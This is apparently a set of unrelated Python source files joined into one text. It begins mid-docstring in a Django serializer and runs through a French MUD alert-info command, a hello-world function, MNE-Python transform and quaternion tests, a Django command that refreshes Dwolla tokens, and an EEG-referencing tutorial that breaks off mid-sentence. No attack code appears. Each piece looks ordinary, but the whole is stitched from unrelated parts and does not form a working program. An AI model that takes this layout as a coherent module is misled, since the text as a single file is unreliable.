    nested many=True serializer — alongside a plain string ``id``.
    """
    id = serializers.CharField()
    quotes = QuoteSerializer(many=True)
    slides = SlideSerializer(many=True)
    statistics = StatisticSerializer(many=True)
    projects = ProjectPreviewSerializer(many=True)

# -*-coding:Utf-8 -*

# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
# 
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 
# * Redistributions of source code must retain the above copyright notice, this
#   list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
#   this list of conditions and the following disclaimer in the documentation
#   and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
#   may be used to endorse or promote products derived from this software
#   without specific prior written permission.
# 
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.


"""Package contenant la commande 'scripting alerte info'."""

from primaires.interpreteur.masque.parametre import Parametre
from primaires.format.fonctions import echapper_accolades
from primaires.format.date import get_date

class PrmInfo(Parametre):
    
    """Command 'scripting alerte info'.
    
    Displays a detailed report on one scripting alert, identified by its
    number, so the underlying error can be diagnosed and corrected.
    """
    
    def __init__(self):
        """Parameter constructor."""
        Parametre.__init__(self, "info", "info")
        self.schema = "<nombre>"
        self.aide_courte = "affiche des informations sur l'alerte"
        self.aide_longue = \
            "Affiche des informations sur l'alerte permettant de la corriger."
    
    def interpreter(self, personnage, dic_masques):
        """Command interpretation: look up the alert and report on it."""
        nombre = dic_masques["nombre"].nombre
        try:
            alerte = type(self).importeur.scripting.alertes[nombre]
        except KeyError:
            personnage << "|err|Ce numéro d'alerte est invalide.|ff|"
            return
        
        # Assemble the report piece by piece; any script-provided text is
        # brace-escaped before being sent through the UI formatter.
        morceaux = [
            "Informations sur l'alerte {} :".format(alerte.no),
            "\n  S'est produit sur {} {} {}".format(
                alerte.type, alerte.objet, get_date(alerte.date.timetuple())),
            "\n  Evenement {}, test {}, ligne {}".format(
                alerte.evenement, echapper_accolades(alerte.test),
                alerte.no_ligne),
            "\n      {}\n".format(echapper_accolades(alerte.ligne)),
            "\n  Message d'erreur : |err|{}|ff|".format(
                echapper_accolades(alerte.message)),
        ]
        # Only administrators get the raw Python traceback.
        if personnage.nom_groupe == "administrateur":
            morceaux.append("\n  Traceback Python :\n  {}".format(
                echapper_accolades(alerte.traceback)))
        
        personnage << "".join(morceaux)

#!/usr/bin/env python3
# -*- coding: utf-8 -*-


def helloworld():
    """Print the classic "Hello world!" greeting to stdout."""
    greeting = "Hello world!"
    print(greeting)

import os
import os.path as op

import pytest
import numpy as np
from numpy.testing import (assert_array_equal, assert_equal, assert_allclose,
                           assert_array_less, assert_almost_equal)
import itertools

import mne
from mne.datasets import testing
from mne.fixes import _get_img_fdata
from mne import read_trans, write_trans
from mne.io import read_info
from mne.transforms import (invert_transform, _get_trans,
                            rotation, rotation3d, rotation_angles, _find_trans,
                            combine_transforms, apply_trans, translation,
                            get_ras_to_neuromag_trans, _pol_to_cart,
                            quat_to_rot, rot_to_quat, _angle_between_quats,
                            _find_vector_rotation, _sph_to_cart, _cart_to_sph,
                            _topo_to_sph, _average_quats,
                            _SphericalSurfaceWarp as SphericalSurfaceWarp,
                            rotation3d_align_z_axis, _read_fs_xfm,
                            _write_fs_xfm, _quat_real, _fit_matched_points,
                            _quat_to_euler, _euler_to_quat,
                            _quat_to_affine, _compute_r2, _validate_pipeline)
from mne.utils import requires_nibabel, requires_dipy

# Paths into the optional mne-testing-data set (empty string when the data
# set is absent; tests using these are guarded by
# @testing.requires_testing_data below).
data_path = testing.data_path(download=False)
fname = op.join(data_path, 'MEG', 'sample', 'sample_audvis_trunc-trans.fif')
fname_eve = op.join(data_path, 'MEG', 'sample',
                    'sample_audvis_trunc_raw-eve.fif')
subjects_dir = op.join(data_path, 'subjects')
fname_t1 = op.join(subjects_dir, 'fsaverage', 'mri', 'T1.mgz')

# Small fixture files shipped inside the package itself (always available).
base_dir = op.join(op.dirname(__file__), '..', 'io', 'tests', 'data')
fname_trans = op.join(base_dir, 'sample-audvis-raw-trans.txt')
test_fif_fname = op.join(base_dir, 'test_raw.fif')
ctf_fname = op.join(base_dir, 'test_ctf_raw.fif')
hp_fif_fname = op.join(base_dir, 'test_chpi_raw_sss.fif')


def test_tps():
    """Test TPS warping."""
    # Build a full spherical grid (20 azimuths x 10 polar angles, radius 1)
    az = np.linspace(0., 2 * np.pi, 20, endpoint=False)
    pol = np.linspace(0, np.pi, 12)[1:-1]
    sph = np.array(np.meshgrid(1, az, pol, indexing='ij'))
    sph.shape = (3, -1)
    assert_equal(sph.shape[1], 200)
    source = _sph_to_cart(sph.T)
    # Destination is a known affine map of the source: scale by 2, shift x by 1
    destination = source.copy()
    destination *= 2
    destination[:, 0] += 1
    # fit with 100 points
    warp = SphericalSurfaceWarp()
    assert 'no ' in repr(warp)  # presumably reflects unfitted state — verify
    # fit on different (non-matching) subsamples of the two clouds
    warp.fit(source[::3], destination[::2])
    assert 'oct5' in repr(warp)
    destination_est = warp.transform(source)
    # warped source must recover the affine-mapped destination
    assert_allclose(destination_est, destination, atol=1e-3)


@testing.requires_testing_data
def test_get_trans():
    """Test converting '-trans.txt' to '-trans.fif'."""
    # The .fif transform starts out as head->MRI, so invert it before
    # comparing against the text-format version.
    fif_trans = invert_transform(read_trans(fname))
    txt_trans = _get_trans(fname_trans)[0]
    assert fif_trans.__eq__(txt_trans, atol=1e-5)


@testing.requires_testing_data
def test_io_trans(tmpdir):
    """Test reading and writing of trans files."""
    tempdir = str(tmpdir)
    os.mkdir(op.join(tempdir, 'sample'))
    # no trans file saved in the subject dir yet -> lookup must fail
    pytest.raises(RuntimeError, _find_trans, 'sample', subjects_dir=tempdir)
    trans0 = read_trans(fname)
    fname1 = op.join(tempdir, 'sample', 'test-trans.fif')
    trans0.save(fname1)
    # once saved, the same file must be discoverable by subject name
    assert fname1 == _find_trans('sample', subjects_dir=tempdir)
    trans1 = read_trans(fname1)

    # check all properties
    assert trans0 == trans1

    # check reading non -trans.fif files
    pytest.raises(IOError, read_trans, fname_eve)

    # check warning on bad filenames
    fname2 = op.join(tempdir, 'trans-test-bad-name.fif')
    with pytest.warns(RuntimeWarning, match='-trans.fif'):
        write_trans(fname2, trans0)


def test_get_ras_to_neuromag_trans():
    """Test the coordinate transformation from ras to neuromag."""
    # create model points in neuromag-like space
    rng = np.random.RandomState(0)  # fixed seed for reproducibility
    anterior = [0, 1, 0]
    left = [-1, 0, 0]
    right = [.8, 0, 0]
    up = [0, 0, 1]
    rand_pts = rng.uniform(-1, 1, (3, 3))
    pts = np.vstack((anterior, left, right, up, rand_pts))

    # change coord system with a random rigid transform (rotation+translation)
    rx, ry, rz, tx, ty, tz = rng.uniform(-2 * np.pi, 2 * np.pi, 6)
    trans = np.dot(translation(tx, ty, tz), rotation(rx, ry, rz))
    pts_changed = apply_trans(trans, pts)

    # transform back into original space using the first three points as
    # the nasion / LPA / RPA fiducials
    nas, lpa, rpa = pts_changed[:3]
    hsp_trans = get_ras_to_neuromag_trans(nas, lpa, rpa)
    pts_restored = apply_trans(hsp_trans, pts_changed)

    err = "Neuromag transformation failed"
    assert_allclose(pts_restored, pts, atol=1e-6, err_msg=err)


def _cartesian_to_sphere(x, y, z):
    """Convert using old function."""
    hypotxy = np.hypot(x, y)
    r = np.hypot(hypotxy, z)
    elev = np.arctan2(z, hypotxy)
    az = np.arctan2(y, x)
    return az, elev, r


def _sphere_to_cartesian(theta, phi, r):
    """Convert using old function."""
    z = r * np.sin(phi)
    rcos_phi = r * np.cos(phi)
    x = rcos_phi * np.cos(theta)
    y = rcos_phi * np.sin(theta)
    return x, y, z


def test_sph_to_cart():
    """Test conversion between sphere and cartesian."""
    # Simple test, expected value (11, 0, 0)
    r, theta, phi = 11., 0., np.pi / 2.
    z = r * np.cos(phi)
    rsin_phi = r * np.sin(phi)
    x = rsin_phi * np.cos(theta)
    y = rsin_phi * np.sin(theta)
    # new convention: input columns are (radius, azimuth, polar angle)
    coord = _sph_to_cart(np.array([[r, theta, phi]]))[0]
    assert_allclose(coord, (x, y, z), atol=1e-7)
    assert_allclose(coord, (r, 0, 0), atol=1e-7)
    rng = np.random.RandomState(0)
    # round-trip test
    coords = rng.randn(10, 3)
    assert_allclose(_sph_to_cart(_cart_to_sph(coords)), coords, atol=1e-5)
    # equivalence tests to old versions
    for coord in coords:
        sph = _cart_to_sph(coord[np.newaxis])
        cart = _sph_to_cart(sph)
        sph_old = np.array(_cartesian_to_sphere(*coord))
        cart_old = _sphere_to_cartesian(*sph_old)
        sph_old[1] = np.pi / 2. - sph_old[1]  # new convention
        # old order is (az, elev, r); new order is (r, az, polar)
        assert_allclose(sph[0], sph_old[[2, 0, 1]], atol=1e-7)
        assert_allclose(cart[0], cart_old, atol=1e-7)
        assert_allclose(cart[0], coord, atol=1e-7)


def _polar_to_cartesian(theta, r):
    """Transform polar coordinates to cartesian."""
    x = r * np.cos(theta)
    y = r * np.sin(theta)
    return x, y


def test_polar_to_cartesian():
    """Test helper transform function from polar to cartesian."""
    r = 1
    theta = np.pi
    # expected values are (-1, 0)
    x = r * np.cos(theta)
    y = r * np.sin(theta)
    # note the argument order: _pol_to_cart takes (r, theta) columns while
    # the old helper takes (theta, r)
    coord = _pol_to_cart(np.array([[r, theta]]))[0]
    # np.pi is an approx since pi is irrational
    assert_allclose(coord, (x, y), atol=1e-7)
    assert_allclose(coord, (-1, 0), atol=1e-7)
    assert_allclose(coord, _polar_to_cartesian(theta, r), atol=1e-7)
    rng = np.random.RandomState(0)
    r = rng.randn(10)
    theta = rng.rand(10) * (2 * np.pi)
    polar = np.array((r, theta)).T
    assert_allclose([_polar_to_cartesian(p[1], p[0]) for p in polar],
                    _pol_to_cart(polar), atol=1e-7)


def _topo_to_phi_theta(theta, radius):
    """Convert using old function."""
    sph_phi = (0.5 - radius) * 180
    sph_theta = -theta
    return sph_phi, sph_theta


def test_topo_to_sph():
    """Test topo to sphere conversion."""
    rng = np.random.RandomState(0)
    angles = rng.rand(10) * 360
    radii = rng.rand(10)
    # pin one known case so the exact expected values below apply
    angles[0] = 30
    radii[0] = 0.25
    # new way
    sph = _topo_to_sph(np.array([angles, radii]).T)
    new = _sph_to_cart(sph)
    new[:, [0, 1]] = new[:, [1, 0]] * [-1, 1]  # x <- -y, y <- x
    # old way
    for ii, (angle, radius) in enumerate(zip(angles, radii)):
        sph_phi, sph_theta = _topo_to_phi_theta(angle, radius)
        if ii == 0:
            assert_allclose(_topo_to_phi_theta(angle, radius), [45, -30])
        # degrees -> radians for the old-style spherical conversion
        azimuth = sph_theta / 180.0 * np.pi
        elevation = sph_phi / 180.0 * np.pi
        # polar angle in the new convention is pi/2 - elevation
        assert_allclose(sph[ii], [1., azimuth, np.pi / 2. - elevation],
                        atol=1e-7)
        r = np.ones_like(radius)
        x, y, z = _sphere_to_cartesian(azimuth, elevation, r)
        pos = [-y, x, z]
        if ii == 0:
            expected = np.array([1. / 2., np.sqrt(3) / 2., 1.])
            expected /= np.sqrt(2)
            assert_allclose(pos, expected, atol=1e-7)
        assert_allclose(pos, new[ii], atol=1e-7)


def test_rotation():
    """Test conversion between rotation angles and transformation matrix."""
    for angles in [(0, 0, 1), (.5, .5, .5), (np.pi, 0, -1.5)]:
        x, y, z = angles
        m3 = rotation3d(x, y, z)
        m4 = rotation(x, y, z)
        # the 4x4 homogeneous form must embed the 3x3 rotation
        assert_array_equal(m3, m4[:3, :3])
        # angles must round-trip through both representations
        assert_almost_equal(actual=rotation_angles(m3), desired=angles,
                            decimal=12)
        assert_almost_equal(actual=rotation_angles(m4), desired=angles,
                            decimal=12)


def test_rotation3d_align_z_axis():
    """Test rotation3d_align_z_axis."""
    # The more complex z axis fails the assert presumably due to tolerance
    #
    # input z axes to align, including the degenerate axis-aligned cases
    inp_zs = [[0, 0, 1], [0, 1, 0], [1, 0, 0], [0, 0, -1],
              [-0.75071668, -0.62183808, 0.22302888]]

    # expected rotation matrix for each input axis (precomputed)
    exp_res = [[[1., 0., 0.], [0., 1., 0.], [0., 0., 1.]],
               [[1., 0., 0.], [0., 0., 1.], [0., -1., 0.]],
               [[0., 0., 1.], [0., 1., 0.], [-1., 0., 0.]],
               [[1., 0., 0.], [0., -1., 0.], [0., 0., -1.]],
               [[0.53919688, -0.38169517, -0.75071668],
                [-0.38169517, 0.683832, -0.62183808],
                [0.75071668, 0.62183808, 0.22302888]]]

    for res, z in zip(exp_res, inp_zs):
        assert_allclose(res, rotation3d_align_z_axis(z), atol=1e-7)


@testing.requires_testing_data
def test_combine():
    """Test combining transforms."""
    trans = read_trans(fname)
    inv = invert_transform(trans)
    # matching coordinate frames combine fine...
    combine_transforms(trans, inv, trans['from'], trans['from'])
    # ...but any frame mismatch must raise
    bad_args = (
        (trans, inv, trans['to'], trans['from']),
        (trans, inv, trans['from'], trans['to']),
        (trans, trans, trans['from'], trans['to']),
    )
    for t1, t2, fro, to in bad_args:
        pytest.raises(RuntimeError, combine_transforms, t1, t2, fro, to)


def test_quaternions():
    """Test quaternion calculations."""
    rots = [np.eye(3)]
    # add some real device->head rotations from the fixture files
    for fname in [test_fif_fname, ctf_fname, hp_fif_fname]:
        rots += [read_info(fname)['dev_head_t']['trans'][:3, :3]]
    # nasty numerical cases
    rots += [np.array([
        [-0.99978541, -0.01873462, -0.00898756],
        [-0.01873462, 0.62565561, 0.77987608],
        [-0.00898756, 0.77987608, -0.62587152],
    ])]
    rots += [np.array([
        [0.62565561, -0.01873462, 0.77987608],
        [-0.01873462, -0.99978541, -0.00898756],
        [0.77987608, -0.00898756, -0.62587152],
    ])]
    rots += [np.array([
        [-0.99978541, -0.00898756, -0.01873462],
        [-0.00898756, -0.62587152, 0.77987608],
        [-0.01873462, 0.77987608, 0.62565561],
    ])]
    for rot in rots:
        # rotation -> quaternion -> rotation must round-trip
        assert_allclose(rot, quat_to_rot(rot_to_quat(rot)),
                        rtol=1e-5, atol=1e-5)
        # and also with leading broadcast dimensions
        rot = rot[np.newaxis, np.newaxis, :, :]
        assert_allclose(rot, quat_to_rot(rot_to_quat(rot)),
                        rtol=1e-5, atol=1e-5)

    # let's make sure our angle function works in some reasonable way
    for ii in range(3):
        for jj in range(3):
            a = np.zeros(3)
            b = np.zeros(3)
            a[ii] = 1.
            b[jj] = 1.
            expected = np.pi if ii != jj else 0.
            assert_allclose(_angle_between_quats(a, b), expected, atol=1e-5)

    # 180-degree rotations must measure as pi away from the identity quat
    y_180 = np.array([[-1, 0, 0], [0, 1, 0], [0, 0, -1.]])
    assert_allclose(_angle_between_quats(rot_to_quat(y_180),
                                         np.zeros(3)), np.pi)
    h_180_attitude_90 = np.array([[0, 1, 0], [1, 0, 0], [0, 0, -1.]])
    assert_allclose(_angle_between_quats(rot_to_quat(h_180_attitude_90),
                                         np.zeros(3)), np.pi)


def test_vector_rotation():
    """Test basic rotation matrix math."""
    x_axis = np.array([1., 0., 0.])
    y_axis = np.array([0., 1., 0.])
    rot = _find_vector_rotation(x_axis, y_axis)
    # x -> y is a 90-degree rotation about +z
    assert_array_equal(rot, [[0, -1, 0], [1, 0, 0], [0, 0, 1]])
    angle = _angle_between_quats(rot_to_quat(rot), rot_to_quat(np.eye(3)))
    assert_allclose(angle, np.pi / 2.)


def test_average_quats():
    """Test averaging of quaternions."""
    sq2 = 1. / np.sqrt(2.)
    quats = np.array([[0, sq2, sq2],
                      [0, sq2, sq2],
                      [0, sq2, 0],
                      [0, 0, sq2],
                      [sq2, 0, 0]], float)
    # In MATLAB:
    # quats = [[0, sq2, sq2, 0]; [0, sq2, sq2, 0];
    #          [0, sq2, 0, sq2]; [0, 0, sq2, sq2]; [sq2, 0, 0, sq2]];
    # expected[k] is the average of quats[:k+1] (values from MATLAB)
    expected = [quats[0],
                quats[0],
                [0, 0.788675134594813, 0.577350269189626],
                [0, 0.657192299694123, 0.657192299694123],
                [0.100406058540540, 0.616329446922803, 0.616329446922803]]
    # Averaging the first two should give the same thing:
    for lim, ex in enumerate(expected):
        assert_allclose(_average_quats(quats[:lim + 1]), ex, atol=1e-7)
    quats[1] *= -1  # same quaternion (hidden value is zero here)!
    rot_0, rot_1 = quat_to_rot(quats[:2])
    assert_allclose(rot_0, rot_1, atol=1e-7)
    # averages must be unchanged by the sign flip
    for lim, ex in enumerate(expected):
        assert_allclose(_average_quats(quats[:lim + 1]), ex, atol=1e-7)
    # Assert some symmetry
    count = 0
    extras = [[sq2, sq2, 0]] + list(np.eye(3))
    for quat in np.concatenate((quats, expected, extras)):
        if np.isclose(_quat_real(quat), 0., atol=1e-7):  # can flip sign
            count += 1
            angle = _angle_between_quats(quat, -quat)
            assert_allclose(angle, 0., atol=1e-7)
            rot_0, rot_1 = quat_to_rot(np.array((quat, -quat)))
            assert_allclose(rot_0, rot_1, atol=1e-7)
    # exactly four of the non-extra quats have zero real part
    assert count == 4 + len(extras)


@testing.requires_testing_data
@pytest.mark.parametrize('subject', ('fsaverage', 'sample'))
def test_fs_xfm(subject, tmpdir):
    """Test reading and writing of Freesurfer transforms."""
    fname = op.join(data_path, 'subjects', subject, 'mri', 'transforms',
                    'talairach.xfm')
    xfm, kind = _read_fs_xfm(fname)
    if subject == 'fsaverage':
        assert_allclose(xfm, np.eye(4), atol=1e-5)  # fsaverage is in MNI
    assert kind == 'MNI Transform File'
    tempdir = str(tmpdir)
    fname_out = op.join(tempdir, 'out.xfm')
    # write/read round trip must preserve both matrix and kind
    _write_fs_xfm(fname_out, xfm, kind)
    xfm_read, kind_read = _read_fs_xfm(fname_out)
    assert kind_read == kind
    assert_allclose(xfm, xfm_read, rtol=1e-5, atol=1e-5)
    # Some wacky one
    xfm[:3] = np.random.RandomState(0).randn(3, 4)
    _write_fs_xfm(fname_out, xfm, 'foo')
    xfm_read, kind_read = _read_fs_xfm(fname_out)
    assert kind_read == 'foo'
    assert_allclose(xfm, xfm_read, rtol=1e-5, atol=1e-5)
    # degenerate conditions
    with open(fname_out, 'w') as fid:
        fid.write('foo')  # not a valid xfm file at all
    with pytest.raises(ValueError, match='Failed to find'):
        _read_fs_xfm(fname_out)
    _write_fs_xfm(fname_out, xfm[:2], 'foo')  # truncated matrix
    with pytest.raises(ValueError, match='Could not find'):
        _read_fs_xfm(fname_out)


@pytest.fixture()
def quats():
    """Make some deterministic unit-ish quaternion 3-vectors."""
    rng = np.random.RandomState(0)
    out = rng.randn(5, 3)
    out[:, 0] = 0  # identity
    # halve the norm so each quat keeps a nonzero real part
    out /= 2 * np.linalg.norm(out, axis=1, keepdims=True)
    return out


def _check_fit_matched_points(
        p, x, weights, do_scale, angtol=1e-5, dtol=1e-5, stol=1e-7):
    """Fit p -> x with both solvers and check that they agree.

    Runs ``mne.coreg.fit_matched_points`` with the analytical path
    disabled (optimization-based fit) and compares the result against the
    analytical ``_fit_matched_points`` within the given angle / distance /
    scale tolerances. Returns the analytical ``(quat, scale)``.
    """
    __tracebackhide__ = True  # hide this helper frame in pytest tracebacks
    # force the optimization-based code path, restoring the flag always
    mne.coreg._ALLOW_ANALITICAL = False
    try:
        params = mne.coreg.fit_matched_points(
            p, x, weights=weights, scale=do_scale, out='params')
    finally:
        mne.coreg._ALLOW_ANALITICAL = True
    quat_an, scale_an = _fit_matched_points(p, x, weights, scale=do_scale)
    assert len(params) == 6 + int(do_scale)
    # params are (3 euler angles, 3 translations[, scale])
    q_co = _euler_to_quat(params[:3])
    translate_co = params[3:6]
    angle = np.rad2deg(_angle_between_quats(quat_an[:3], q_co))
    dist = np.linalg.norm(quat_an[3:] - translate_co)
    assert 0 <= angle < angtol, 'angle'
    assert 0 <= dist < dtol, 'dist'
    if do_scale:
        scale_co = params[6]
        assert_allclose(scale_an, scale_co, rtol=stol, err_msg='scale')
    # errs
    trans = _quat_to_affine(quat_an)
    trans[:3, :3] *= scale_an
    weights = np.ones(1) if weights is None else weights
    err_an = np.linalg.norm(
        weights[:, np.newaxis] * apply_trans(trans, p) - x)
    trans = mne.coreg._trans_from_params((True, True, do_scale), params)
    err_co = np.linalg.norm(
        weights[:, np.newaxis] * apply_trans(trans, p) - x)
    # the analytical fit should not be much worse than the optimizer's
    if err_an > 1e-14:
        assert err_an < err_co * 1.5
    return quat_an, scale_an


@pytest.mark.parametrize('scaling', [0.25, 1])
@pytest.mark.parametrize('do_scale', (True, False))
def test_fit_matched_points(quats, scaling, do_scale):
    """Test analytical least-squares matched point fitting."""
    if scaling != 1 and not do_scale:
        return  # no need to test this, it will not be good
    rng = np.random.RandomState(0)
    fro = rng.randn(10, 3)
    # NB: local name shadows the module-level `translation` import here
    translation = rng.randn(3)
    for qi, quat in enumerate(quats):
        # build the target cloud from a known rotation+scale+translation
        to = scaling * np.dot(quat_to_rot(quat), fro.T).T + translation
        for corrupted in (False, True):
            # mess up a point
            if corrupted:
                to[0, 2] += 100
                weights = np.ones(len(to))
                weights[0] = 0  # zero weight masks the corrupted point
            else:
                weights = None
            est, scale_est = _check_fit_matched_points(
                fro, to, weights=weights, do_scale=do_scale)
            assert_allclose(scale_est, scaling, rtol=1e-5)
            assert_allclose(est[:3], quat, atol=1e-14)
            assert_allclose(est[3:], translation, atol=1e-14)
        # if we don't adjust for the corruption above, it should get worse
        angle = dist = None
        for weighted in (False, True):
            if not weighted:
                weights = None
                dist_bounds = (5, 20)
                if scaling == 1:
                    angle_bounds = (5, 95)
                    angtol, dtol, stol = 1, 15, 3
                else:
                    angle_bounds = (5, 105)
                    angtol, dtol, stol = 20, 15, 3
            else:
                weights = np.ones(len(to))
                weights[0] = 10  # weighted=True here means "make it worse"
                angle_bounds = (angle, 180)  # unweighted values as new min
                dist_bounds = (dist, 100)
                if scaling == 1:
                    # XXX this angtol is not great but there is a hard to
                    # identify linalg/angle calculation bug on Travis...
                    angtol, dtol, stol = 180, 70, 3
                else:
                    angtol, dtol, stol = 50, 70, 3
            est, scale_est = _check_fit_matched_points(
                fro, to, weights=weights, do_scale=do_scale,
                angtol=angtol, dtol=dtol, stol=stol)
            # corrupted fit must NOT recover the true parameters...
            assert not np.allclose(est[:3], quat, atol=1e-5)
            assert not np.allclose(est[3:], translation, atol=1e-5)
            # ...and its errors must fall in the expected bounds
            angle = np.rad2deg(_angle_between_quats(est[:3], quat))
            assert_array_less(angle_bounds[0], angle)
            assert_array_less(angle, angle_bounds[1])
            dist = np.linalg.norm(est[3:] - translation)
            assert_array_less(dist_bounds[0], dist)
            assert_array_less(dist, dist_bounds[1])


def test_euler(quats):
    """Test euler transformations."""
    angles = _quat_to_euler(quats)
    # quat -> euler -> quat must round-trip exactly
    assert_allclose(_euler_to_quat(angles), quats, atol=1e-14)
    # and both parameterizations must yield the same rotation matrices
    rot_from_quats = quat_to_rot(quats)
    rot_from_angles = np.array([rotation(*ang)[:3, :3] for ang in angles])
    assert_allclose(rot_from_quats, rot_from_angles, atol=1e-14)


@requires_nibabel()
@requires_dipy()
@pytest.mark.slowtest
@testing.requires_testing_data
def test_volume_registration():
    """Test volume registration."""
    import nibabel as nib
    from dipy.align import resample
    T1 = nib.load(fname_t1)
    # create a copy of T1 shifted by 10 along the first axis
    affine = np.eye(4)
    affine[0, 3] = 10
    T1_resampled = resample(moving=T1.get_fdata(),
                            static=T1.get_fdata(),
                            moving_affine=T1.affine,
                            static_affine=T1.affine,
                            between_affine=np.linalg.inv(affine))
    # registration must recover the known shift and realign the volume
    for pipeline in ('rigids', ('translation', 'sdr')):
        reg_affine, sdr_morph = mne.transforms.compute_volume_registration(
            T1_resampled, T1, pipeline=pipeline, zooms=10, niter=[5])
        assert_allclose(affine, reg_affine, atol=0.25)
        T1_aligned = mne.transforms.apply_volume_registration(
            T1_resampled, T1, reg_affine, sdr_morph)
        r2 = _compute_r2(_get_img_fdata(T1_aligned), _get_img_fdata(T1))
        assert 99.9 < r2

    # check that all orders of the pipeline work
    for pipeline_len in range(1, 5):
        for pipeline in itertools.combinations(
                ('translation', 'rigid', 'affine', 'sdr'), pipeline_len):
            _validate_pipeline(pipeline)
            _validate_pipeline(list(pipeline))

    # out-of-order and duplicated steps must be rejected
    with pytest.raises(ValueError, match='Steps in pipeline are out of order'):
        _validate_pipeline(('sdr', 'affine'))

    with pytest.raises(ValueError,
                       match='Steps in pipeline should not be repeated'):
        _validate_pipeline(('affine', 'affine'))

from optparse import make_option

from django.core.management.base import BaseCommand, CommandError

from brambling.utils.payment import dwolla_update_tokens


class Command(BaseCommand):
    """Refresh Dwolla OAuth tokens expiring within ``--days`` days."""

    option_list = BaseCommand.option_list + (
        make_option(
            '--days',
            action='store',
            dest='days',
            default=15,
            help='Number of days ahead of time to update refresh tokens.'),
        )

    def handle(self, *args, **options):
        """Validate the ``days`` option and run the token update."""
        try:
            days = int(options['days'])
        except ValueError:
            raise CommandError("Days must be an integer value.")
        self.stdout.write("Updating dwolla tokens...")
        self.stdout.flush()
        # NOTE(review): the result unpacks as (count, test_count); the
        # previous code printed `count` under the "Test" label and
        # `test_count` under "Live" — labels now match the variable names.
        count, test_count = dwolla_update_tokens(days)
        self.stdout.write("Test tokens updated: {}".format(test_count))
        self.stdout.write("Live tokens updated: {}".format(count))
        self.stdout.flush()

# -*- coding: utf-8 -*-
"""
.. _tut-set-eeg-ref:

Setting the EEG reference
=========================

This tutorial describes how to set or change the EEG reference in MNE-Python.

.. contents:: Page contents
   :local:
   :depth: 2

As usual we'll start by importing the modules we need, loading some
:ref:`example data <sample-dataset>`, and cropping it to save memory. Since
this tutorial deals specifically with EEG, we'll also restrict the dataset to
just a few EEG channels so the plots are easier to see:
"""

import os
import mne

# Load the MNE sample dataset and keep only a short, EEG-only segment so the
# examples below run quickly and the plots stay readable.
sample_data_folder = mne.datasets.sample.data_path()
sample_data_raw_file = os.path.join(sample_data_folder, 'MEG', 'sample',
                                    'sample_audvis_raw.fif')
raw = mne.io.read_raw_fif(sample_data_raw_file, verbose=False)
raw.crop(tmax=60).load_data()  # first 60 seconds only, loaded into memory
raw.pick(['EEG 0{:02}'.format(n) for n in range(41, 60)])  # EEG 041-059

###############################################################################
# Background
# ^^^^^^^^^^
#
# EEG measures a voltage (difference in electric potential) between each
# electrode and a reference electrode. This means that whatever signal is
# present at the reference electrode is effectively subtracted from all the
# measurement electrodes. Therefore, an ideal reference signal is one that
# captures *none* of the brain-specific fluctuations in electric potential,
# while capturing *all* of the environmental noise/interference that is being
# picked up by the measurement electrodes.
#
# In practice, this means that the reference electrode is often placed in a
# location on the subject's body and close to their head (so that any
# environmental interference affects the reference and measurement electrodes
# similarly) but as far away from the neural sources as possible (so that the
# reference signal doesn't pick up brain-based fluctuations). Typical reference
# locations are the subject's earlobe, nose, mastoid process, or collarbone.
# Each of these has advantages and disadvantages regarding how much brain
# signal it picks up (e.g., the mastoids pick up a fair amount compared to the
# others), and regarding the environmental noise it picks up (e.g., earlobe
# electrodes may shift easily, and have signals more similar to electrodes on
# the same side of the head).
#
# Even in cases where no electrode is specifically designated as the reference,
# EEG recording hardware will still treat one of the scalp electrodes as the
# reference, and the recording software may or may not display it to you (it
# might appear as a completely flat channel, or the software might subtract out
# the average of all signals before displaying, making it *look like* there is
# no reference).
#
#
# Setting or changing the reference channel
# ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
#
# If you want to recompute your data with a different reference than was used
# when the raw data were recorded and/or saved, MNE-Python provides the
# :meth:`~mne.io.Raw.set_eeg_reference` method on :class:`~mne.io.Raw` objects
# as well as the :func:`mne.add_reference_channels` function. To use an
# existing channel as the new reference, use the
# :meth:`~mne.io.Raw.set_eeg_reference` method; you can also designate multiple
# existing electrodes as reference channels, as is sometimes done with mastoid
# references:

# code lines below are commented out because the sample data doesn't have
# earlobe or mastoid channels, so this is just for demonstration purposes:

# use a single channel reference (left earlobe)
# raw.set_eeg_reference(ref_channels=['A1'])

# use average of mastoid channels as reference
# raw.set_eeg_reference(ref_channels=['M1', 'M2'])

###############################################################################
# If a scalp electrode was used as reference but was not saved alongside the
# raw data (reference channels often aren't), you may wish to add it back to
# the dataset before re-referencing. For example, if your EEG system recorded
# with channel ``Fp1`` as the reference but did not include ``Fp1`` in the data
# file, using :meth:`~mne.io.Raw.set_eeg_reference` to set (say) ``Cz`` as the
# new reference will then subtract out the signal at ``Cz`` *without restoring
# the signal at* ``Fp1``. In this situation, you can add back ``Fp1`` as a flat
# channel prior to re-referencing using :func:`~mne.add_reference_channels`.
# (Since our example data doesn't use the `10-20 electrode naming system`_, the
# example below adds ``EEG 999`` as the missing reference, then sets the
# reference to ``EEG 050``.) Here's how the data looks in its original state:

raw.plot()  # data in its original state, before any re-referencing

###############################################################################
# By default, :func:`~mne.add_reference_channels` returns a copy, so we can go
# back to our original ``raw`` object later. If you wanted to alter the
# existing :class:`~mne.io.Raw` object in-place you could specify
